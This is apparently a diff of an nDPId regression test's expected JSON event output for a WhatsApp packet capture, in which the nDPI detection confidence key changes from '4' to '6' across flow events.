00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655078418150,"pkt":"eJS0JASgYDjgxTWgCABFAAA86upAAD8GF1fAqAJkszzDMbYGFGbAe04zAAAAAKAC\/\/8ChgAAAgQFtAQCCAo4N\/qqAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655078418150,"pkt":"eJS0JASgYDjgxTWgCABFAAA06utAAD8GF17AqAJkszzDMbYGFGbAe040KCJ2LIAQAIB2bQAAAQEICjg3+s2LqpA6"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655078418150,"pkt":"eJS0JASgYDjgxTWgCABFAAA46uxAAD8GF1nAqAJkszzDMbYGFGbAe040KCJ2LIAYAIAxGAAAAQEICjg3+tGLqpA6RUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655069476999,"flow_last_seen":1655069477452,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1269,"flow_tot_l4_payload_len":1317,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068672605,"flow_last_seen":1655068672866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655069476999,"flow_last_seen":1655069477452,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1269,"flow_tot_l4_payload_len":1317,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068672605,"flow_last_seen":1655068672866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":442,"packets-processed":441,"total-skipped-flows":0,"total-l4-payload-len":36355,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":56,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":56,"total-idle-flows":44,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":365,"global_ts_msec":1655079015860} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655079015860,"flow_last_seen":1655079015860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655079015860,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1655079015860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655079015860,"pkt":"eJS0JASgYDjgxTWgCABFAAA8+71AAD8GBoTAqAJkszzDMbawFGbU0lPTAAAAAKAC\/\/+CegAAAgQFtAQCCArHFtE1AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1655079015890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655079015890,"pkt":"eJS0JASgYDjgxTWgCABFAAA0+75AAD8GBovAqAJkszzDMbawFGbU0lPU4I1M54AQAKyMuwAAAQEICscW0VNPFaco"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1655079015897,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655079015897,"pkt":"eJS0JASgYDjgxTWgCABFAAA4+79AAD8GBobAqAJkszzDMbawFGbU0lPU4I1M54AYAKxHYwAAAQEICscW0VpPFacoRUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655079015860,"flow_last_seen":1655079015927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655079015927,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655071203961,"flow_last_seen":1655071204088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655071204543,"flow_last_seen":1655071205708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655071168997,"flow_last_seen":1655071169315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655079015860,"flow_last_seen":1655079015927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655079015927,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655071203961,"flow_last_seen":1655071204088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655071204543,"flow_last_seen":1655071205708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655071168997,"flow_last_seen":1655071169315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655079242727,"flow_last_seen":1655079242727,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655079242727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1655079242727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655079242727,"pkt":"eJS0JASgYDjgxTWgCABFAAA81XtAAD8GLNbAqAJkszzDIbBKFGYSKeedAAAAAKAC\/\/8NrgAAAgQFtAQCCAoGazwDAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1655079242758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655079242758,"pkt":"eJS0JASgYDjgxTWgCABFAAA01XxAAD8GLN3AqAJkszzDIbBKFGYSKeee9mtN3YAQAKzI+QAAAQEICgZrPCF7C7NT"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1655079242759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655079242759,"pkt":"eJS0JASgYDjgxTWgCABFAAA41X1AAD8GLNjAqAJkszzDIbBKFGYSKeee9mtN3YAYAKyDpgAAAQEICgZrPCN7C7NTRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655079242727,"flow_last_seen":1655079242760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655079242760,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655079242727,"flow_last_seen":1655079242760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655079242760,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":458,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":458,"packets-processed":457,"total-skipped-flows":0,"total-l4-payload-len":37951,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":58,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":58,"total-idle-flows":47,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":379,"global_ts_msec":1655085444940} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655085444940,"flow_last_seen":1655085444940,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655085444940,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1655085444940,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655085444940,"pkt":"eJS0JASgYDjgxTWgCABFAAA8OS9AAD8GyRLAqAJkszzDMeuoFGZwsQ0oAAAAAKAC\/\/8MiAAAAgQFtAQCCApJMzrhAAAAAAEDAwg="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1655085444971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655085444971,"pkt":"eJS0JASgYDjgxTWgCABFAAA0OTBAAD8GyRnAqAJkszzDMeuoFGZwsQ0pZQWH8YAQAVeTjwAAAQEICkkzOwA0eITQ"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1655085445085,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655085445085,"pkt":"eJS0JASgYDjgxTWgCABFAAA4OTFAAD8GyRTAqAJkszzDMeuoFGZwsQ0pZQWH8YAYAVdNzAAAAQEICkkzO3I0eITQRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655085444940,"flow_last_seen":1655085445116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655085445116,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074455881,"flow_last_seen":1655074456133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655075014427,"flow_last_seen":1655075014609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655075686356,"flow_last_seen":1655075686549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074111508,"flow_last_seen":1655074111844,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074681295,"flow_last_seen":1655074681757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655073402411,"flow_last_seen":1655073402833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655085444940,"flow_last_seen":1655085445116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655085445116,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074455881,"flow_last_seen":1655074456133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655075014427,"flow_last_seen":1655075014609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655075686356,"flow_last_seen":1655075686549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
